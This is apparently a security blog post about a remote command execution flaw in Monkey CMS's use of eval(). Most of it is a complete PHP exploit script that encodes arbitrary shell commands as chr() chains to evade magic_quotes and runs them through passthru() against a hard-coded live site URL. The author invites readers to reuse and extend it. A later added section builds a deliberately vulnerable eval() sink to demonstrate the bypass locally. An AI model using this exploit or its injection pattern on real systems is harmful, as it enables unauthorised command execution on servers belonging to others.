A few months ago, while I was searching for a piece of code inside a CMS, I accidentally came across a portal named “Monkey CMS”. It seemed a good but unpopular CMS, so I decided to glance at its source, and soon after I realized it was worse than I had thought: a dozen common vulnerabilities had recently been reported against it. This post is based on a remote command execution in Monkey CMS that results from inappropriate and insecure use of the eval() function. By default, an RCE hole of this kind can mostly be exploited as easily as drinking water (not always, see this). However, when the remote server has magic_quotes enabled (of course only in PHP < 5.4.0, where the feature still exists), the attacker may have trouble exploiting the vulnerability, because every single quote in the input arrives escaped with a backslash. I faced exactly this situation, where I was not able to issue my command on the remote server; hence I wrote a simple exploit to bypass the magic_quotes problem (I would hardly call it evasion, since it is at most a simple trick):
<?php
/** To prevent a time out **/
set_time_limit(0);
/** Error reporting **/
error_reporting(0);
/** Necessary variables **/
if ($argc < 2)
{
    echo 'Usage: php exploit.php "<command>"', "\n";
    exit(1);
}
$command = $argv[1];
$GoodCommand = NULL;
/** Turning every character into its chr() equivalent, so the payload needs no quotes **/
for($i=0;$i<strlen($command);$i++)
{
    $GoodCommand .= 'chr('.ord(substr($command,$i,1)).').';
}
/** We don't need the last dot (.) **/
$GoodCommand = substr($GoodCommand,0,-1);
/** $site can be assigned to $argv[2] **/
$site = 'http://www.monkeycms.com/index.php?page=TagIndex&tags=';
/** The first ${...} assigns the command to $command inside eval(), the second ${...} runs it **/
$payload = '${$command='.$GoodCommand.'}${@passthru($command)}';
/** Initializing (banner) **/
echo ' ______ .-" "-. / \ | | |, .-. .-. ,| | )(__/ \__)( | |/ /\ \| (@_ (_ ^^ _) _ ) \_______\__|IIIIII|__/__________________________ (_)@8@8{}<________|-\IIIIII/-|___________________________> )_/ \ / (@ `--------`',"\n\n";
echo '/--------------------------------------------------------------\\',"\n";
echo '| Exploit by Yashar shahinzadeh & Mormoroth ',"\n";
echo '| Credit goes for http://ha.cker.ir & http://y-shahinzadeh.ir ',"\n";
echo '\--------------------------------------------------------------/',"\n\n";
/** Some information for the user **/
echo '['.date("H:i:s").'] Generating payload... done!',"\n";
echo '['.date("H:i:s").'] Payload: '.$payload,"\n";
echo '['.date("H:i:s").'] Output: ',"\n\n";
/** Pure output of the issued command: the page HTML that follows the passthru() output is stripped **/
echo trim(preg_replace("/(<!DOCTYPE).*?(<\\/html>)/is",'',file_get_contents($site.$payload))),"\n";
exit();
/** Yashar shahinzadeh **/
Note that the exploit above can easily be redistributed and extended for further use. The following snapshots illustrate how it works:
The main idea of the exploit is to avoid the single quote (') entirely, since that is the character magic_quotes escapes. The quoted string is replaced by a chain of chr() calls, and the result is first stored in a variable through PHP's ${...} syntax and then passed to passthru(). The substitution below is what makes it work:
${@passthru('id')} => ${$command=chr(105).chr(100)}${@passthru($command)}
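To see the bypass end to end without a Monkey CMS install, here is an added example that is not part of the original post and not the CMS's own code: a constructed eval() sink that interpolates user input into a double-quoted string (the pattern the post describes; the real CMS code is not reproduced here), with addslashes() standing in for magic_quotes_gpc, which was removed in PHP 5.4.0. The helper names build_payload, run_sink and magic_quotes, and the variable name $c, are my own.

```php
<?php
// Added example, not Monkey CMS code. A constructed eval() sink plus the
// post's quote-free payload. Runs on PHP 7 and 8 (PHP 8.2+ deprecates the
// "${expr}" string syntax but still executes it).

/** Encode $cmd as chr(N).chr(N)... so the payload contains no quote at all. */
function build_payload(string $cmd): string
{
    $chrs = [];
    for ($i = 0; $i < strlen($cmd); $i++) {
        $chrs[] = 'chr(' . ord($cmd[$i]) . ')';
    }
    // Inside a double-quoted string, ${expr} evaluates expr and uses the
    // result as a variable name. The first ${...} assigns the decoded
    // command to $c, the second one runs it.
    return '${$c=' . implode('.', $chrs) . '}${@passthru($c)}';
}

/**
 * Constructed vulnerable sink (an assumption about the CMS pattern, not its
 * real code): untrusted $tags lands inside a double-quoted string that is
 * eval()'d. Returns whatever the eval'd code wrote to the output buffer.
 * The @ silences the "undefined variable" warnings from the throw-away
 * ${...} lookups, much like error_reporting(0) in the exploit.
 */
function run_sink(string $tags): string
{
    ob_start();
    try {
        @eval('$title = "Tag index for ' . $tags . '";');
    } catch (Throwable $e) {   // PHP 7+: a parse error inside eval() is thrown
        echo '[eval failed: ' . $e->getMessage() . ']';
    }
    return ob_get_clean();
}

/** What magic_quotes_gpc did to every GET/POST/COOKIE value: backslash before ' " \ and NUL. */
function magic_quotes(string $input): string
{
    return addslashes($input);
}

$naive  = "\${@passthru('id')}";   // needs quotes, so magic_quotes breaks it
$bypass = build_payload('id');      // no quotes, so magic_quotes leaves it untouched

echo "naive  after magic_quotes: " . magic_quotes($naive) . "\n";
echo "  sink output: " . run_sink(magic_quotes($naive)) . "\n\n";
echo "bypass after magic_quotes: " . magic_quotes($bypass) . "\n";
echo "  sink output: " . run_sink(magic_quotes($bypass)) . "\n";
```

Run it with `php example.php` on a Unix host that has `id`. The naive payload becomes `${@passthru(\'id\')}` after addslashes(), and the escaped quotes make the expression inside `${...}` a syntax error, so the sink reports a failed eval and nothing runs. The chr() payload contains no quote or backslash, passes through addslashes() unchanged, and the sink output is the result of `id`. The same encoding loop is what the exploit's `$GoodCommand` builds, so any command, including ones with spaces and quotes of its own, survives the filter.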
Finally, I hope you find this tutorial useful.